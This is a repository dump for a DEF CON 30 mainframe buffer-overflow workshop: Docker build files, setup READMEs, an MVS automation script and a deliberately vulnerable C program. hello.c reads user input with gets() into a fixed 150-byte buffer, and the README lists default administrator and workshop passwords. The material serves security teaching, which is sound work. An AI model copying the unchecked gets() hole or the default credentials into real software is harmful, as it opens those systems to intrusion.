├── .github ├── buildkitd.toml └── workflows │ └── sysgen.yml ├── .gitignore ├── Dockerfile ├── GETSPLOIT ├── README.md └── hello.c ├── README.md ├── automation.py ├── extra ├── FTPD.MVP ├── Wallpapers │ ├── title.jpg │ ├── wallpaper.1.png │ ├── wallpaper.2.png │ ├── wallpaper.3.png │ ├── youdidit.jpg │ └── youdidit2.jpg ├── a2etable.py ├── e2alookup.py └── findbytes.py ├── jcl ├── MACLFTPD.jcl ├── logon_screen.jcl └── terminals.jcl ├── matrix.txt ├── motd.txt ├── mvs.sh ├── overflows ├── LGBT400 ├── LOC400 └── WTO400 ├── rexx ├── DEBRUIJN.rex └── decodei.rex ├── screenshot.png ├── upload.py ├── usersjcl.py ├── vtam_screen.ans ├── web3270.ini └── wiki ├── start_tiddlywiki.sh ├── tiddlywiki └── mywiki │ ├── tiddlers │ ├── $__DefaultTiddlers.tid │ ├── $__Import.tid │ ├── $__SiteSubtitle.tid │ ├── $__SiteTitle.tid │ ├── $__StoryList.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_control-panel.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_export-page.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_home.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_import.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_new-image.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_new-tiddler.tid │ ├── $__config_PageControlButtons_Visibility_$__core_ui_Buttons_theme.tid │ ├── $__themes_tiddlywiki_vanilla_metrics_storyright.tid │ ├── $__themes_tiddlywiki_vanilla_metrics_storywidth.tid │ ├── $__themes_tiddlywiki_vanilla_metrics_tiddlerwidth.tid │ ├── ASCII_EBCDIC Table.tid │ ├── Getting Started.tid │ ├── Joblogheader.png │ ├── Joblogheader.png.meta │ ├── LAB6.png │ ├── LAB6.png.meta │ ├── Lab 1 - Run HELLO.tid │ ├── Lab 10 - FTP Buffer Overflow.tid │ ├── Lab 11 - 2 Crash 2 Furious.tid │ ├── Lab 12 - Hackers Returns.tid │ ├── Lab 13 - Not So Fast There.tid │ ├── Lab 14 - Sockets and EBCDIC.tid │ ├── Lab 15 - RCE.tid │ ├── Lab 2 - First Overflow.tid │ ├── Lab 3 - 
Find our return address.tid │ ├── Lab 4 - Exploit!.tid │ ├── Lab 5 - OPENTST.tid │ ├── Lab 6 - De Brujin.tid │ ├── Lab 7 - De Brujin Overflow.tid │ ├── Lab 8 - Add our own Shell Code.tid │ ├── Lab 9 - Privesc with ARBAUTH.tid │ ├── Screenshot_2022-07-24_12-32-18.png │ ├── Screenshot_2022-07-24_12-32-18.png.meta │ ├── Screenshot_2022-07-24_12-32-44.png │ ├── Screenshot_2022-07-24_12-32-44.png.meta │ ├── Screenshot_2022-07-24_12-41-23.png │ ├── Screenshot_2022-07-24_12-41-23.png.meta │ ├── Screenshot_2022-07-31_11-06-42.png │ ├── Screenshot_2022-07-31_11-06-42.png.meta │ ├── Screenshot_2022-07-31_11-32-55.png │ ├── Screenshot_2022-07-31_11-32-55.png.meta │ ├── Screenshot_2022-07-31_11-40-25.png │ ├── Screenshot_2022-07-31_11-40-25.png.meta │ ├── Screenshot_2022-07-31_11-50-09.png │ ├── Screenshot_2022-07-31_11-50-09.png.meta │ ├── Screenshot_2022-07-31_12-00-00.png │ ├── Screenshot_2022-07-31_12-00-00.png.meta │ ├── Screenshot_2022-07-31_12-05-20.png │ ├── Screenshot_2022-07-31_12-05-20.png.meta │ ├── Screenshot_2022-07-31_14-59-18.png │ ├── Screenshot_2022-07-31_14-59-18.png.meta │ ├── Screenshot_2022-07-31_15-01-47.png │ ├── Screenshot_2022-07-31_15-01-47.png.meta │ ├── Screenshot_2022-07-31_15-25-34.png │ ├── Screenshot_2022-07-31_15-25-34.png.meta │ ├── Screenshot_2022-07-31_17-01-06.png │ ├── Screenshot_2022-07-31_17-01-06.png.meta │ ├── Screenshot_2022-07-31_17-14-33.png │ ├── Screenshot_2022-07-31_17-14-33.png.meta │ ├── Screenshot_2022-07-31_17-36-55.png │ ├── Screenshot_2022-07-31_17-36-55.png.meta │ ├── Screenshot_2022-07-31_23-23-29.png │ ├── Screenshot_2022-07-31_23-23-29.png.meta │ ├── Screenshot_2022-07-31_23-34-15.png │ ├── Screenshot_2022-07-31_23-34-15.png.meta │ ├── Screenshot_2022-08-01_00-06-05.png │ ├── Screenshot_2022-08-01_00-06-05.png.meta │ ├── Screenshot_2022-08-01_09-21-12.png │ ├── Screenshot_2022-08-01_09-21-12.png.meta │ ├── Screenshot_2022-08-01_09-28-19.png │ ├── Screenshot_2022-08-01_09-28-19.png.meta │ ├── 
Screenshot_2022-08-01_16-56-25.png │ ├── Screenshot_2022-08-01_16-56-25.png.meta │ ├── Screenshot_2022-08-01_16-58-16.png │ ├── Screenshot_2022-08-01_16-58-16.png.meta │ ├── Screenshot_2022-08-01_17-13-16.png │ ├── Screenshot_2022-08-01_17-13-16.png.meta │ ├── Screenshot_2022-08-01_17-48-30.png │ ├── Screenshot_2022-08-01_17-48-30.png.meta │ ├── Screenshot_2022-08-01_17-55-01.png │ ├── Screenshot_2022-08-01_17-55-01.png.meta │ ├── Screenshot_2022-08-01_17-56-51.png │ ├── Screenshot_2022-08-01_17-56-51.png.meta │ ├── Screenshot_2022-08-03_16-17-06.png │ ├── Screenshot_2022-08-03_16-17-06.png.meta │ ├── Screenshot_2022-08-04_15-46-24.png │ ├── Screenshot_2022-08-04_15-46-24.png.meta │ ├── Welcome DEF CON 30!.tid │ ├── arbauthwto.png │ ├── arbauthwto.png.meta │ ├── arbpoc.png │ ├── arbpoc.png.meta │ ├── clistaddress.png │ ├── clistaddress.png.meta │ ├── dataset user.png │ ├── dataset user.png.meta │ ├── debruijnrexx.png │ ├── debruijnrexx.png.meta │ ├── denied.png │ ├── denied.png.meta │ ├── editor.png │ ├── editor.png.meta │ ├── emem.png │ ├── emem.png.meta │ ├── exploitshell.png │ ├── exploitshell.png.meta │ ├── exploitxor.png │ ├── exploitxor.png.meta │ ├── hexhiighlight.png │ ├── hexhiighlight.png.meta │ ├── image.png │ ├── image.png.meta │ ├── image_edit.png │ ├── image_edit.png.meta │ ├── joblog.png │ ├── joblog.png.meta │ ├── lgtbmemory.png │ ├── lgtbmemory.png.meta │ ├── linewtosml.png │ ├── linewtosml.png.meta │ ├── neowhiterabbit.png │ ├── neowhiterabbit.png.meta │ ├── newwtosml.png │ ├── newwtosml.png.meta │ ├── opentstac0.png │ ├── opentstac0.png.meta │ ├── privesc.png │ ├── privesc.png.meta │ ├── putv.png │ ├── putv.png.meta │ ├── rceoverflow.png │ ├── rceoverflow.png.meta │ ├── shellcodejcl.png │ ├── shellcodejcl.png.meta │ ├── thebytes.png │ ├── thebytes.png.meta │ ├── title.jpg │ ├── title.jpg.meta │ ├── wallpaper.3.png │ ├── wallpaper.3.png.meta │ ├── whiterabbit.png │ ├── whiterabbit.png.meta │ ├── youdidit.jpg │ └── youdidit.jpg.meta │ └── 
tiddlywiki.info └── users.txt /.github/buildkitd.toml: -------------------------------------------------------------------------------- 1 | # .github/buildkitd.toml 2 | [worker.oci] 3 | max-parallelism = 1 4 | -------------------------------------------------------------------------------- /.github/workflows/sysgen.yml: -------------------------------------------------------------------------------- 1 | 2 | name: Mainframe Overflow Container 3 | 4 | on: 5 | push: 6 | branches: 7 | - main 8 | pull_request: 9 | branches: 10 | - main 11 | workflow_dispatch: 12 | jobs: 13 | # Sysgen 14 | mvsce-kicks: 15 | name: MVS/CE Overflow Class Cross Platform Docker 16 | runs-on: [ubuntu-latest] 17 | steps: 18 | - name: Checkout 19 | uses: actions/checkout@v4 20 | - name: Set up QEMU 21 | uses: docker/setup-qemu-action@v3 22 | - name: Set up Docker Buildx 23 | uses: docker/setup-buildx-action@v3 24 | with: 25 | config: .github/buildkitd.toml 26 | - name: Login to Docker Hub 27 | uses: docker/login-action@v3 28 | with: 29 | username: ${{ secrets.DOCKERHUB_USERNAME }} 30 | password: ${{ secrets.DOCKERHUB_TOKEN }} 31 | - name: Build and push 32 | uses: docker/build-push-action@v5 33 | with: 34 | platforms: linux/amd64,linux/arm64 35 | push: true 36 | tags: mainframed767/defcon30:latest -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | wiki/*.png 2 | jcl/upload.jcl 3 | ARBAUTH/ 4 | users/* 5 | reader.jcl 6 | GETSPLOIT/hello.obj 7 | GETSPLOIT/hello.load 8 | web3270/ 9 | a.out 10 | docker/ 11 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | 2 | 3 | FROM mainframed767/jcc:wine as getsploit_builder 4 | # First compile and link hello.c to hello.load 5 | WORKDIR / 6 | COPY GETSPLOIT/hello.c hello.c 7 | RUN wine /jcc/jcc.exe 
-I/jcc/include/ -o hello.c 8 | RUN /jcc/prelink -s /jcc/objs /hello.load /hello.obj 9 | 10 | FROM mainframed767/mvsce:2.0.3 as MVSCE_builder 11 | # Install rdrprep 12 | RUN unset LD_LIBRARY_PATH && apt-get update && apt-get install -yq git build-essential python3-pip lftp 13 | RUN pip3 install ebcdic 14 | WORKDIR / 15 | RUN git clone --depth 1 https://github.com/mvslovers/rdrprep.git 16 | WORKDIR /rdrprep 17 | ENV HOST_ARCH=NOT_PENTIUM 18 | RUN make && make install 19 | # Copy compiled hello.load 20 | WORKDIR /builder 21 | ADD ./ /builder/ 22 | COPY --from=getsploit_builder /hello.load /builder/GETSPLOIT/hello.load 23 | RUN git clone --depth 1 https://github.com/jake-mainframe/ARBAUTH 24 | # Build the JCL 25 | RUN ./upload.py motd.txt 26 | RUN mkdir ./users && ./usersjcl.py 27 | RUN for i in users/*.jcl; do rdrprep $i; mv reader.jcl $i.ebcdic; ls $i.ebcdic; done 28 | COPY extra/FTPD.MVP /MVSCE/MVP/packages/FTPD 29 | # Submit the JCL to MVS/CE 30 | # until ./sysgen.py --timeout 3600 --version ${RELEASE_VERSION} --CONTINUE; do echo "Failed, rerunning"; done 31 | RUN until python3 -u automation.py --mvsce /MVSCE --initial; do echo "Failed, trying again"; done 32 | RUN until python3 -u automation.py --mvsce /MVSCE --ftp; do echo "Failed, trying again"; done 33 | RUN until python3 -u automation.py --mvsce /MVSCE --users; do echo "Failed, trying again"; done 34 | # Install web3270 and its requirements 35 | WORKDIR / 36 | RUN git clone --depth 1 https://github.com/MVS-sysgen/web3270.git 37 | WORKDIR /web3270 38 | RUN pip install --no-cache-dir --upgrade pip && \ 39 | pip install --no-cache-dir --user -r requirements.txt 40 | 41 | 42 | # Final Build 43 | FROM mainframed767/mvsce:2.0.3 44 | COPY --from=MVSCE_builder /MVSCE /MVSCE 45 | COPY --from=MVSCE_builder /root/.local /root/.local 46 | COPY --from=MVSCE_builder /web3270 /web3270 47 | ADD web3270.ini /web3270/ 48 | ADD mvs.sh / 49 | RUN unset LD_LIBRARY_PATH && apt-get update && apt-get install --no-install-recommends 
-yq c3270 nodejs npm &&\ 50 | sed -i "s/0400.8/0400.32/g" /MVSCE/conf/local.cnf &&\ 51 | npm install -g tiddlywiki@5.2.0 52 | COPY wiki/users.txt /auth/users.txt 53 | WORKDIR /var/lib/tiddlywiki 54 | COPY wiki/tiddlywiki/ /var/lib/tiddlywiki/ 55 | # Add init-and-run script 56 | ADD wiki/start_tiddlywiki.sh /usr/local/bin/start_tiddlywiki 57 | WORKDIR / 58 | VOLUME ["/config","/dasd","/printers","/punchcards","/logs", "/certs"] 59 | EXPOSE 3221 3223 3270 3505 3506 8888 8443 2121 2323 60 | ENTRYPOINT ["./mvs.sh"] 61 | 62 | 63 | -------------------------------------------------------------------------------- /GETSPLOIT/README.md: -------------------------------------------------------------------------------- 1 | This is the vulnerable C program used in the class. Original author Jake Labelle. 2 | 3 | To compile it: 4 | 5 | ``` 6 | docker run -it --entrypoint /bin/bash -v $(pwd):/project mainframed767/jcc:wine 7 | cd project/ 8 | wine /jcc/jcc.exe -I/jcc/include/ -o hello.c 9 | /jcc/prelink -s /jcc/objs /project/hello.load /project/hello.obj 10 | ``` -------------------------------------------------------------------------------- /GETSPLOIT/hello.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main (int argc, char ** argv) { 6 | char buff[150]; 7 | printf("Hi, D3FC0N attendee what is your handle?\n"); 8 | gets(buff); 9 | printf("Wake up, %s\n\nThe Matrix has you...\n\n", buff); 10 | printf("Follow the white rabbit.\n\n", buff); 11 | printf(" _________________\n" 12 | " / __ \\ \n" 13 | " | (__) | \n" 14 | " | | \n" 15 | " | .-----. .--. | \n" 16 | " | | | / \\ | \n" 17 | " | '-----' \\ / | \n" 18 | " | | | | \n" 19 | " | LI DC LI | | | \n" 20 | " | LI 30 LI | | |Oo \n" 21 | " | LI LI LI | | |`Oo \n" 22 | " | LI LI LI | | | Oo \n" 23 | " | | | | Oo \n" 24 | " | .------. 
/ \\ | oO \n" 25 | " | | | \\ / | Oo \n" 26 | " | '------' '-oO | oO \n" 27 | " | .---Oo | Oo \n" 28 | " | || ||`Oo oO \n" 29 | " | |'--'| | OoO \n" 30 | " | '----' | \n" 31 | " \\_________________/ \n\n" 32 | " Ring Ring %s\n\n", buff); 33 | return 0; 34 | }; 35 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # DEF CON 30 Workshop Mainframe Container 2 | 3 | ![DEFCON MAINFRAME](/screenshot.png?raw=true "DEF CON 30") 4 | 5 | The scripts here are used to build the MVS 3.8j virtual mainframe for the DEFCON 30 workshop. 6 | 7 | Thank you for taking a look at the DEFCON 30 Mainframe Buffer Overflow workshop. 8 | 9 | ## Use docker 10 | 11 | This docker container has everything you need to learn how to do MVS buffer overflows! 12 | 13 | To start the class run the container and go to http://localhost:8080 14 | 15 | To run the container use the below commands, make sure to change `$(pwd)/docker` to a folder for your system. 16 | The `$(pwd)` puts the docker volumes in your current working folder. 17 | 18 | ### Minimal Container 19 | Use this command if you just want to run it self contained. :warning: If you remove and relaunch the container 20 | you will lose any and all changes you made to the mainframe environment. 21 | 22 | ```bash 23 | docker run -d \ 24 | --name=defcon30 \ 25 | -e HUSER=defcon \ 26 | -e HPASS=defcon \ 27 | -p 2323:3223 \ 28 | -p 8888:8888 \ 29 | -p 2121-2141:2121-2141 \ 30 | -p 8443:8443 \ 31 | -p 8080:8080 \ 32 | -p 31337-31347:31337-31347 \ 33 | -v ~/dumps:/printers \ 34 | --restart unless-stopped \ 35 | mainframed767/defcon30:latest 36 | ``` 37 | 38 | Ports explained: 39 | 40 | - 2323: 3270 server port 41 | - 8443: Web based tn3270 client, the secret is D3FC0N 42 | - 8888: Hercules console web server. 
Username/password: defcon 43 | - 8080: The workshop instructions 44 | - 2121-2141 & 31337-31347: Range of web ports for FTP server 45 | 46 | Python scripts mentioned can be found here: https://github.com/mainframed/DC30_Workshop/tree/main/extra 47 | 48 | ### Expert Container 49 | 50 | This exposes more ports and allows you to have volumes with permanence. Gives access to the 51 | hercules and MVS consoles, the card readers/writers, etc. 52 | 53 | ```bash 54 | docker run -d \ 55 | --name=defcon30 \ 56 | -e HUSER=docker \ 57 | -e HPASS=docker \ 58 | -p 3221:3221 \ 59 | -p 2323:3223 \ 60 | -p 3270:3270 \ 61 | -p 3505:3505 \ 62 | -p 3506:3506 \ 63 | -p 8888:8888 \ 64 | -p 2121:2121 \ 65 | -p 8443:8443 \ 66 | -p 8080:8080 \ 67 | -p 31337-31347:31337-31347 \ 68 | -v $(pwd)/docker/config:/config \ 69 | -v $(pwd)/docker/printers:/printers \ 70 | -v $(pwd)/docker/punchcards:/punchcards \ 71 | -v $(pwd)/docker/logs:/logs \ 72 | -v $(pwd)/docker/dasd:/dasd \ 73 | -v $(pwd)/docker/certs:/certs \ 74 | --restart unless-stopped \ 75 | mainframed767/defcon30:latest 76 | ``` 77 | 78 | **Ports** 79 | 80 | | Port | Description | 81 | |--------------|-------------------------------------------------------------------------------------| 82 | | 2323 | TLS Encrypted TN3270 Server Port | 83 | | 3270 | Unencrypted TN3270 Server Port | 84 | | 3221 | Encrypted FTPD server | 85 | | 2121 | Unencrypted FTP Server Port | 86 | | 8443 | Web based 3270 client which auto connects to lab mainframe https://localhost:8443 | 87 | | 8080 | The class Wiki https://localhost:8080 | 88 | | 8888 | Hercules Web Server/MVS Console. User/pass = docker | 89 | | 3505 | Punch card reader. Converts ASCII to EBCDIC. | 90 | | 3506 | Punch card reader. Only accepts EBCDIC files. 
| 91 | | 31337-32337 | FTP Server passive port range | 92 | 93 | **Volumes** 94 | 95 | | Folder | Description | 96 | |-------------|--------------------------------------------------------| 97 | | /config | Contains the Hercules and web3270 config files | 98 | | /printers | Contains the output of the printers on `CLASS=A` | 99 | | /punchcards | Contains the output of the punchcard writer on `CLASS=B` | 100 | | /logs | Contains Hercules logs | 101 | | /dasd | Contains the MVS/CE disk images | 102 | | /certs | Contains the certificates used for TLS encryption | 103 | 104 | ### Users 105 | 106 | | Username | Password | Description | 107 | |----------|----------|----------------------------------------------| 108 | | IBMUSER | SYS1 | Administrative User with access to everything | 109 | | MVSCE01 | CUL8TR | Administrative User with access to everything | 110 | | MVSCE02 | PASS4U | Generic User | 111 | | DC0 | DC0 | DEFCON Workshop User | 112 | | DC1 | DC1 | DEFCON Workshop User | 113 | | DC2 | DC2 | DEFCON Workshop User | 114 | | DC3 | DC3 | DEFCON Workshop User | 115 | | DC4 | DC4 | DEFCON Workshop User | 116 | | DC5 | DC5 | DEFCON Workshop User | 117 | | DC6 | DC6 | DEFCON Workshop User | 118 | | DC7 | DC7 | DEFCON Workshop User | 119 | | DC8 | DC8 | DEFCON Workshop User | 120 | | DC9 | DC9 | DEFCON Workshop User | 121 | | DC10 | DC10 | DEFCON Workshop User | 122 | | DC11 | DC11 | DEFCON Workshop User | 123 | | DC12 | DC12 | DEFCON Workshop User | 124 | | DC13 | DC13 | DEFCON Workshop User | 125 | | DC14 | DC14 | DEFCON Workshop User | 126 | | DC15 | DC15 | DEFCON Workshop User | 127 | | DC16 | DC16 | DEFCON Workshop User | 128 | | DC17 | DC17 | DEFCON Workshop User | 129 | | DC18 | DC18 | DEFCON Workshop User | 130 | | DC19 | DC19 | DEFCON Workshop User | 131 | | DC20 | DC20 | DEFCON Workshop User | 132 | | DC21 | DC21 | DEFCON Workshop User | 133 | | DC22 | DC22 | DEFCON Workshop User | 134 | | DC23 | DC23 | DEFCON Workshop User | 135 | 136 | :warning: With the current 
setup the maximum number of concurrent users is 24. If a 25th user logs on you get 137 | the following error message `IKT00203I ADDRESS SPACE CREATION FAILED`. 138 | 139 | ## Building from scratch 140 | 141 | - Download the most recent version of MVSCE from https://github.com/MVS-sysgen/sysgen/releases 142 | - Copy the vulnerable FTPD server to MVP: `cp extra/FTPD.MVP MVSCE/MVP/packages` 143 | - Launch MVSCE 144 | - Submit the job `MACLFTPD.jcl`: `cat jcl/MACLFTPD.jcl|ncat --send-only -w1 127.0.0.1 3505` 145 | - Submit the job `logon_screen.jcl`: `cat jcl/logon_screen.jcl|ncat --send-only -w1 127.0.0.1 3505` 146 | - Submit the job `terminals.jcl`: `cat terminals.jcl|ncat --send-only -w1 127.0.0.1 3505` 147 | - Clone the ARBAUTH repo: `git clone https://github.com/jake-mainframe/ARBAUTH` 148 | - Run the python script `upload.py`: `./upload.py motd.txt` 149 | - Submit the job `upload.jcl`: `cat upload.jcl|ncat --send-only -w1 127.0.0.1 3505` 150 | - Install `https://github.com/mvslovers/rdrprep` on your Linux box 151 | - Clone `https://github.com/mvslovers/jcc` to this folder 152 | - Install wine and wine 32: `sudo apt install wine wine32` 153 | - Compile `GETSPLOIT/hello.c`: 154 | - `wine ./jcc/jcc.exe -I./jcc/include -o ./GETSPLOIT/hello.c` 155 | - `./jcc/prelink -s ./jcc/objs hello.load hello.obj` 156 | - Copy `hello.load` to `./GETSPLOIT`: `cp hello.load GETSPLOIT` 157 | - Run usersjcl.py: `./usersjcl.py` 158 | - Convert each job in the users folder with `rdrprep` and submit them one by one: 159 | - `for i in *.jcl; do echo $i;rdrprep $i;cat reader.jcl|ncat --send-only -w1 172.17.0.3 3506; read; done` 160 | - You can check the output of MVSCE `printers/prt00e.txt` to see that each job completed 161 | - Shut down MVS/CE 162 | - Re-IPL MVS/CE and enjoy your lab environment 163 | - Then download web3270 from https://github.com/MVS-sysgen/web3270 164 | - Follow the instructions on how to prepare for web3270 165 | - Edit `web3270.ini` as appropriate 166 | - Launch web3270 
with `python3 -u ./server.py --config /path/to/config --certs /path/to/certs` 167 | 168 | ## Files 169 | 170 | - `GETSPLOIT/hello.c` vulnerable C program from https://github.com/jake-mainframe/GETSPLOIT 171 | - `ARBAUTH` from https://github.com/jake-mainframe/ARBAUTH 172 | - EBCDIC files `overflows/LGBT400`, `overflows/LOC400`, `overflows/WTO400` 173 | - `Dockerfile` used to build docker image 174 | - `MACLFTPD.jcl`: JCL file to install MACLIBS and FTPD server using MVP 175 | - `logon_screen.ans`/`jcl/logon_screen.jcl`: ANSI/JCL to replace the NETSOL logon screen 176 | - `upload.py` generates JCL used to provision datasets, copy files and get the system ready 177 | - `jcl/terminals.jcl` adds 32 new terminal interfaces and updates VTAM config 178 | - `usersjcl.py` creates `DC00.jcl` through `DC23.jcl` in the `./users` folder 179 | - `automation.py` a MVS automation python script used to deploy to docker 180 | - `matrix.txt` Follow the white rabbit 181 | - `rexx/DEBRUIJN.rex`: REXX script to generate de Bruijn pattern 182 | - `rexx/decodei.rex`: decodes MVS hex instructions to human readeable 183 | - `motd.txt` the CLIST run at logon to TSO 184 | - `mvs.sh` the container run script to launch web3270, hercules 185 | 186 | 187 | -------------------------------------------------------------------------------- /automation.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | # This script is used to build the DEFCON 30 class LPAR 4 | # run ./upload.py motd.txt && ./usersjcl.py before running this script 5 | # MVS/CE is required to use this script 6 | # Author: Soldier of FORTRAN 7 | # License: GPLv3 8 | 9 | import os, sys, time, math, ebcdic 10 | from telnetlib import theNULL 11 | import subprocess 12 | import threading 13 | import queue 14 | import socket 15 | from pathlib import Path 16 | import argparse 17 | from datetime import datetime 18 | 19 | #TIMEOUT = 1800 #default timeout in second 20 | TIMEOUT 
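TIMEOUT = 60  # default timeout in seconds

my_parser = argparse.ArgumentParser()
my_parser.add_argument('--mvsce', '-m', default="MVSCE", help="MVSCE Folder location")
my_parser.add_argument("--initial", '-i', help="Initial upload", default=False, action="store_true")
my_parser.add_argument('--ftp', '-f', default=False, action="store_true")
my_parser.add_argument('--users', '-u', default=False, action="store_true")
args = my_parser.parse_args()

cwd = os.getcwd()

print("[AUTOMATION] Current working directory {}".format(cwd))

if not Path("jcl/upload.jcl").is_file():
    print("[ERROR] You must run ./upload.py motd.txt first")
    # Non-zero exit: the Dockerfile runs this script in an `until ...; do` loop,
    # so a zero exit here would be treated as a successful provisioning run.
    sys.exit(1)

# Hercules log fragments that mean the run cannot recover. Seen in either
# output stream they make the reader threads request a hercules kill.
error_check = [
    'open error',
    'Creating crash dump',
    'DISASTROUS ERROR',
    'HHC01023W Waiting for port 3270 to become free for console connections',
    'disabled wait state 00020000 80000005'
]

quit_herc_event = threading.Event()    # set by quit_hercules: the monitor thread exits quietly
kill_hercules = threading.Event()      # set by the reader threads on an irrecoverable error
reset_herc_event = threading.Event()   # set while hercules is restarted: reader threads exit
STDERR_to_logs = threading.Event()     # when set, every stderr line is echoed as [DIAG]
running_folder = os.getcwd()
# Two-digit reply id of the last outstanding MVS reply seen on stdout
# (lines of the form "/*nn ..."); None until one has been seen.
reply_num = None


class herc_automation:
    '''Drives a hercules / MVS 3.8j (MVS/CE) instance from this script.

    hercules is launched with its console on stdin/stdout, two daemon threads
    copy stdout and stderr into queues, and the methods below send console
    commands and wait for expected log lines to appear.
    '''

    def __init__(self,
                 config="conf/local.cnf",
                 rc="conf/mvsce.rc"
                 ):
        '''Remember the hercules config and rc file paths; nothing is started yet.'''
        self.config = config
        self.rc = rc
        self.hercproc = False  # becomes the subprocess.Popen once reset_hercules launches hercules
        self.stderr_q = queue.Queue()
        self.stdout_q = queue.Queue()

    def kill(self):
        '''Kill the hercules process outright (no orderly MVS shutdown).'''
        self.hercproc.kill()

    def start_threads(self):
        '''Start the daemon threads that drain hercules stdout/stderr and watch the process.'''
        self.stdout_thread = threading.Thread(target=self.queue_stdout, args=(self.hercproc.stdout, self.stdout_q))
        self.stderr_thread = threading.Thread(target=self.queue_stderr, args=(self.hercproc.stderr, self.stderr_q))
        self.check_hercules_thread = threading.Thread(target=self.check_hercules, args=[self.hercproc])
        for worker in (self.stdout_thread, self.stderr_thread, self.check_hercules_thread):
            worker.daemon = True
            worker.start()

    def _check_for_errors(self, line):
        '''Flag an irrecoverable hercules message: print it and request a kill.'''
        for errors in error_check:
            if errors in line:
                print("Quiting! Irrecoverable Hercules error: {}".format(line.strip()))
                kill_hercules.set()

    def queue_stdout(self, pipe, q):
        ''' queue the stdout in a non blocking way

        Every non-empty line is echoed as [HERCLOG] (minus a few known-noise
        messages), queued for wait_for_string and scanned for irrecoverable
        errors; a "/*nn ..." line updates the module-level reply_num.
        Exits at EOF (hercules closed the pipe) or while a reset is in progress.
        '''
        global reply_num
        noise = ("HHC90020W", "HHC00007I", "HHC00107I", "HHC00100I")
        while not reset_herc_event.is_set():
            l = pipe.readline()
            if not l:
                # EOF: the original looped forever on the empty string once hercules was gone
                break
            stripped = l.strip()
            if not stripped:
                continue
            if len(stripped) > 3 and l[0:2] == '/*' and l[2:4].isnumeric():
                reply_num = l[2:4]
                print("[AUTOMATION] Reply number set to {}".format(reply_num))
            if not any(code in l for code in noise):
                # ignore these messages, they're just noise
                # HHC90020W 'hthread_setschedparam()' failed at loc=timer.c:193: rc=22: Invalid argument
                # HHC00007I Previous message from function 'hthread_set_thread_prio' at hthreads.c(1170)
                print("[HERCLOG] {}".format(stripped))
            q.put(l)
            self._check_for_errors(l)

    def queue_stderr(self, pipe, q):
        ''' queue the stderr in a non blocking way

        Lines are echoed as [DIAG] only when STDERR_to_logs is set or they
        carry the MIPS counter; every non-empty line is queued and scanned for
        irrecoverable errors. Exits at EOF or while a reset is in progress.
        '''
        while not reset_herc_event.is_set():
            l = pipe.readline()
            if not l:
                break  # EOF
            stripped = l.strip()
            if not stripped:
                continue
            if STDERR_to_logs.is_set() or 'MIPS' in l:
                print("[DIAG] {}".format(stripped))
            q.put(l)
            self._check_for_errors(l)

    def check_hercules(self, hercproc):
        ''' check to make sure hercules is still running

        Polls the process: returns quietly on a quit/reset, kills hercules when a
        reader thread flagged an irrecoverable error, and otherwise treats an
        exit as fatal for the whole script.
        '''
        while hercproc.poll() is None:
            if quit_herc_event.is_set() or reset_herc_event.is_set():
                print("[AUTOMATION] Quit Event enabled exiting hercproc monitoring")
                return
            if kill_hercules.is_set():
                hercproc.kill()
                break
            time.sleep(0.1)  # poll instead of spinning a core

        print("[ERROR] - Hercules Exited Unexpectedly")
        os._exit(1)

    def check_maxcc(self, jobname, steps_cc=None, printer_file='printers/prt00e.txt'):
        '''Checks job and steps results, raises error
        If the step is in steps_cc, check the step vs the cc in the dictionary
        otherwise checks if step is zero

        Args:
            jobname: jobname to look for in the IEF142I step-end lines.
            steps_cc: optional {stepname: expected 4-character cc string};
                steps not listed must end with '0000'.
            printer_file: printer output to scan, relative to the MVS/CE folder.

        Raises:
            ValueError: the job never appears in the printer output, or at
                least one step ended with an unexpected condition code.
        '''
        if steps_cc is None:
            steps_cc = {}  # fresh per call; a shared mutable default would leak between jobs
        print("[AUTOMATION] Checking {} job results".format(jobname))

        found_job = False
        failures = []

        logmsg = '[MAXCC] Jobname: {:<8} Procname: {:<8} Stepname: {:<8} Exit Code: {:<8}'

        with open(printer_file, 'r', errors='ignore') as f:
            for line in f:
                if 'IEF142I' not in line or jobname not in line:
                    continue
                found_job = True

                fields = line.strip().split()
                j = fields[fields.index('IEF142I'):]

                # A "-" in the fourth token means there is no proc-level name:
                # step name is then j[2] and the condition code j[10]; otherwise
                # j[2] is the proc name and everything shifts right by one.
                if j[3] != "-":
                    procname, stepname, maxcc = j[2], j[3], j[11]
                else:
                    procname, stepname, maxcc = '', j[2], j[10]

                print(logmsg.format(j[1], procname, stepname, maxcc))

                expected_cc = steps_cc.get(stepname, '0000')
                if maxcc != expected_cc:
                    error = "Step {} Condition Code does not match expected condition code: {} vs {} review prt00e.txt for errors".format(stepname, maxcc, expected_cc)
                    print(error)
                    failures.append(error)

        if not found_job:
            raise ValueError("Job {} not found in printer output {}".format(jobname, printer_file))
        if failures:
            raise ValueError("; ".join(failures))

    def reset_hercules(self, clpa=False):
        '''(Re)launch hercules, shutting down any running instance first.

        Args:
            clpa: when True hercules is started without the rc file so the
                caller can IPL by hand (see ipl); otherwise `-r self.rc` runs it.

        Raises:
            Exception: hercules is not on PATH, or exited right after launch.
        '''
        print('[AUTOMATION] Restarting hercules')
        self.quit_hercules(msg=False)

        # drain STDERR and STDOUT left over from the previous instance
        for leftover in (self.stdout_q, self.stderr_q):
            while True:
                try:
                    leftover.get(False)
                except queue.Empty:
                    break

        reset_herc_event.set()

        try:
            self.hercmd = subprocess.check_output(["which", "hercules"]).strip()
        except (subprocess.CalledProcessError, OSError) as exc:
            raise Exception('hercules not found') from exc

        print("[AUTOMATION] Launching hercules")

        h = ["hercules", '--externalgui', '-f', self.config]

        if not clpa:
            h.append("-r")
            h.append(self.rc)

        print("[AUTOMATION] Launching hercules with: {}".format(h))

        self.hercproc = subprocess.Popen(h,
                                         stdin=subprocess.PIPE,
                                         stdout=subprocess.PIPE,
                                         stderr=subprocess.PIPE,
                                         universal_newlines=True)
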